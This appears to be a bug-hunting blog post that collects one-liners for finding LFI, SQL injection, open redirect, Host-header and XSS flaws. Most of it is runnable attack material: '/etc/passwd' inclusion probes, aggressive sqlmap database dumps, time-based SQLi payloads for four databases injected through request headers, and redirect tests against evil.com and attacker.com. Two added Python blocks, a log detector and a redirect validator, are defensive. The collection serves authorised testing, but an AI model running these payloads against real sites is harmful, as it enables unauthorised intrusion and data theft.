Many experienced penetration testers, bug hunters, and other people who work in offensive security use well-crafted one-liners to automate specific parts of their workflow, from passive recon to vulnerability detection.
In this post I’ll share a collection of tools and one-liner payloads designed to automate the discovery of common web vulnerabilities such as XSS, SQLi, SSRF, LFI, open redirect, IDOR, keys, secrets, etc. Instead of building full frameworks, these short commands combine widely used utilities like gf, httpx, ffuf, and gau to produce fast, repeatable, and high-signal results, often with a single line of code.
One Liner to find LFI
cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"

waybackurls king.ph | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
For single URL:
Using lostsec
paramspider -d yourtarget.com -o urls.txt
cat output/urls.txt | sed 's/FUZZ//g' > final.txt
python3 lostsec.py -l final.txt -p payloads/xor.txt -t 5

echo yourtarget.com | gau --mc 200 | urldedupe > urls.txt
cat urls.txt | grep -E "\.php|\.asp|\.aspx|\.cfm|\.jsp" | grep '=' | sort > output.txt
cat output.txt | sed 's/=.*/=/' > final.txt
python3 lostsec.py -l final.txt -p payloads/xor.txt -t 5

echo yourtarget.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | urldedupe > output.txt
katana -u yourtarget.com -d 5 | grep '=' | urldedupe | anew output.txt
cat output.txt | sed 's/=.*/=/' > final.txt
python3 lostsec.py -l final.txt -p payloads/xor.txt -t 5
With SQLMap to find SQLi
For a single domain:
subfinder -d example.com -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'
Find URLs with parameters (common SQLi entry points):
echo https://example.com | gau | uro | grep -E "\.php|\.asp|\.aspx|\.jspx|\.jsp" | grep "=" > urls1.txt
You can also use katana:
echo https://example.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | uro | grep -E "\.php|\.asp|\.aspx|\.jspx|\.jsp" > urls2.txt
Use the gf tool to keep only the URLs prone to SQLi:
cat urls1.txt urls2.txt | gf sqli | uro > cleaned-sql.txt
Now you can run sqlmap against the URLs:
sqlmap -m cleaned-sql.txt --batch --random-agent --tamper=space2comment --level=5 --risk=3 --drop-set-cookie --threads 10 --dbs

gf sqli > cleaned-sql.txt; sqlmap -m cleaned-sql.txt --batch --dbs --risk 2 --level 5 --random-agent
Sample SQLi Payloads
MySQL
SELECT SLEEP(10);
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
1 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(FLOOR(RAND()*2),(SELECT SLEEP(5))) AS x FROM information_schema.tables GROUP BY x) y);
' OR IF(1=1, SLEEP(10), 0)-- -
PostgreSQL
SELECT pg_sleep(10);
' OR (CASE WHEN ((CLOCK_TIMESTAMP() - NOW()) < interval '0:0:10') THEN (SELECT '1' || pg_sleep(10)) ELSE '0' END)='1
' OR 1=1; SELECT pg_sleep(5);--
-- Using random() for variability
' OR (SELECT CASE WHEN (random() < 0.5) THEN pg_sleep(5) ELSE pg_sleep(0) END);
MSSQL
WAITFOR DELAY '00:00:10';
'; WAITFOR DELAY '00:00:05'; --
-- Conditional delay
IF (1=1) WAITFOR DELAY '0:0:10';
-- Using IF EXISTS for more realism
'; IF EXISTS (SELECT * FROM users) WAITFOR DELAY '00:00:07';
Oracle
BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;
' OR 1=1; BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;--
-- Conditional check with delay
DECLARE v INTEGER; BEGIN IF 1=1 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END IF; END;

User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'"

time curl -s -H "User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://yourtarget.com/vulnerable-endpoint"
time curl -s -H "X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://yourtarget.com/vulnerable-endpoint"
time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'\"" "https://yourtarget.com/vulnerable-endpoint"
time curl "https://yourtarget.com/page.php?id=if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'\"XOR(if(now()=sysdate(),sleep(10),0))OR\"*/"
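On the detection side, the delay functions these payloads rely on stand out in request logs. The following is an added example, not part of the original post: it scans access-log lines for those functions in the request line, Referer, User-Agent and X-Forwarded-For. The log format (combined log format with a trailing quoted X-Forwarded-For field), the function name and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Delay primitives behind the MySQL, PostgreSQL, MSSQL and Oracle payloads above.
DELAY_PATTERNS = {
    "mysql": re.compile(r"\bsleep\s*\(\s*\d+", re.I),
    "postgresql": re.compile(r"\bpg_sleep\s*\(\s*\d+", re.I),
    "mssql": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "oracle": re.compile(r"\bdbms_pipe\.receive_message\s*\(", re.I),
}

# Assumed format: combined log format plus a trailing quoted X-Forwarded-For.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)" "(?P<xff>[^"]*)"$'
)
FIELDS = ("request", "referer", "user_agent", "xff")


def find_delay_probes(lines):
    """Return (client_ip, field, dbms) for each field holding a delay primitive."""
    hits = []
    for line in lines:
        match = LINE_RE.match(line.strip())
        if match is None:
            continue  # unparsable line; count these separately in production
        for field in FIELDS:
            # Query strings arrive percent-encoded, so decode before matching.
            value = unquote_plus(match.group(field))
            for dbms, pattern in DELAY_PATTERNS.items():
                if pattern.search(value):
                    hits.append((match.group("ip"), field, dbms))
    return hits


# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.4 - - [10/Mar/2025:10:00:00 +0000] "GET /index.php?id=5 HTTP/1.1" 200 812 "-" "SleepTracker/2.0 (iPhone)" "-"
203.0.113.7 - - [10/Mar/2025:10:00:03 +0000] "GET /index.php?id=5 HTTP/1.1" 200 812 "-" "0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "-"
203.0.113.7 - - [10/Mar/2025:10:00:19 +0000] "GET /index.php?id=5 HTTP/1.1" 200 812 "-" "Mozilla/5.0" "'; WAITFOR DELAY '00:00:05'; --"
192.0.2.55 - - [10/Mar/2025:10:01:02 +0000] "GET /page.php?id=1%27%20OR%201%3D1%3B%20SELECT%20pg_sleep(5)%3B-- HTTP/1.1" 200 640 "-" "curl/8.5.0" "-"
""".splitlines()

if __name__ == "__main__":
    for hit in find_delay_probes(SAMPLE_LOG):
        print(hit)
```

The first sample line is a benign User-Agent containing the word "Sleep"; it is not flagged because the patterns require the function-call form.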
Using Waybackurls and Gau
cat collections.txt | while read url; do curl -H "Host: attacker.com" "$url"; done
Using FFuF
ffuf -u https://target.com -H "Host: FUZZ" -w hosts.txt
Detect Open Redirect vulnerabilities with one-liner
When you have URLs collected:
cat urls.txt | gau --o finalurls1.txt
cat urls.txt | katana -d 2 -o finalurls2.txt
cat urls.txt | urlfinder -o finalurls3.txt
cat urls.txt | hakrawler > finalurls4.txt
Merge all the URLs collected:
cat finalurls1.txt finalurls2.txt finalurls3.txt finalurls4.txt | uro | sort -u | tee final.txt
Now you can use filters to find redirect parameters:
cat final.txt | grep -Pi "returnUrl=|continue=|dest=|destination=|forward=|go=|goto=|login\?to=|login_url=|logout=|next=|next_page=|out=|g=|redir=|redirect=|redirect_to=|redirect_uri=|redirect_url=|return=|returnTo=|return_path=|return_to=|return_url=|rurl=|site=|target=|to=|uri=|url=|qurl=|rit_url=|jump=|jump_url=|originUrl=|origin=|Url=|desturl=|u=|Redirect=|location=|ReturnUrl=|redirect_url=|redirect_to=|forward_to=|forward_url=|destination_url=|jump_to=|go_to=|goto_url=|target_url=|redirect_link=" | tee redirect_params.txt
Find redirect parameters with the gf tool:
cat final.txt | gf redirect | uro | sort -u | tee redirect_params.txt

cat redirect_params.txt | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"
With a custom list of open redirect payloads
cat redirect_params.txt | while read url; do cat path/to/wordlist.txt | while read payload; do echo "$url" | qsreplace "$payload"; done; done | httpx-toolkit -silent -fr -mr "google.com"
Using gau and gf
echo target.com | gau | gf redirect | uro | while read url; do cat path/to/wordlist.txt | while read payload; do echo "$url" | qsreplace "$payload"; done; done | httpx-toolkit -silent -fr -mr "google.com"
Using curl to detect Open Redirect
cat urls.txt | qsreplace "https://evil.com" | xargs -I {} curl -s -o /dev/null -w "%{url_effective} -> %{redirect_url}\n" {}
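The checks above only report a finding when the application copies the parameter value into its redirect unvalidated. The following is an added example, not part of the original post, of a server-side check that makes those checks come back negative; ALLOWED_HOSTS, safe_redirect_target and the host app.example.com are hypothetical names chosen for the example.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist for this example; replace with the hosts your app owns.
ALLOWED_HOSTS = {"app.example.com"}


def safe_redirect_target(value, default="/"):
    """Return value if it is a local path or an allowlisted http(s) URL, else default."""
    if not value:
        return default
    # Browsers treat "\" like "/" and drop leading/trailing whitespace.
    cleaned = value.strip().replace("\\", "/")
    # Browsers also strip tabs and newlines inside a URL, so "/<TAB>/evil.com"
    # would be followed as "//evil.com": reject any control character outright.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in cleaned):
        return default
    try:
        parts = urlsplit(cleaned)
    except ValueError:  # e.g. malformed IPv6 literal in the host part
        return default
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept only a path with a single leading "/".
        if cleaned.startswith("/") and not cleaned.startswith("//"):
            return cleaned
        return default
    # Absolute URL: http(s) only, no userinfo ("trusted@evil.com"), exact host match.
    if (parts.scheme in ("http", "https")
            and parts.username is None
            and parts.hostname in ALLOWED_HOSTS):
        return cleaned
    return default


if __name__ == "__main__":
    # Constructed probe values, including the test value used in the commands above.
    for probe in ["https://evil.com", "//evil.com", "/\\evil.com",
                  "https://app.example.com@evil.com/", "/account/settings?tab=1"]:
        print(repr(probe), "->", safe_redirect_target(probe))
```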
Finding XSS with One-Liner
Detect URLs with parameters
echo example.com | gau | gf xss | uro | Gxss | kxss | tee xss_urls.txt
Cleaning the results:
cat xss_urls.txt | grep -oP '^URL: \K\S+' | sed 's/=.*/=/' | sort -u > finalurls.txt
Run open redirect tool for automation:
Reading .js file to find RXSS and Open Redirect with linkfinder
cat js.txt | while read url; do
  echo "Processing URL: $url" >> link-output.txt
  python ~/path/to/your/linkfinder.py -d -i "$url" -o cli >> link-output.txt
  echo "═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═" >> link-output.txt
done
There are many payloads, tools, and one-liner commands available on the internet, but I haven’t tried them all yet. I will continue to update this post every time I discover new payloads, tools, or one-liners for detecting vulnerabilities.
If you liked my article, please leave a respect on my HackTheBox profile.
